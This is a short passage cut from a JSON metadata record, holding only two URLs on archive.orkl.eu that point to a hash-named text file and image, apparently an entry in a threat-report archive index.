		"text": "https://archive.orkl.eu/efb9ae16fbbdec7ecacab9e783f2475d0bdf09d1.txt",
		"img": "https://archive.orkl.eu/efb9ae16fbbdec7ecacab9e783f2475d0bdf09d1.jpg"
	}
}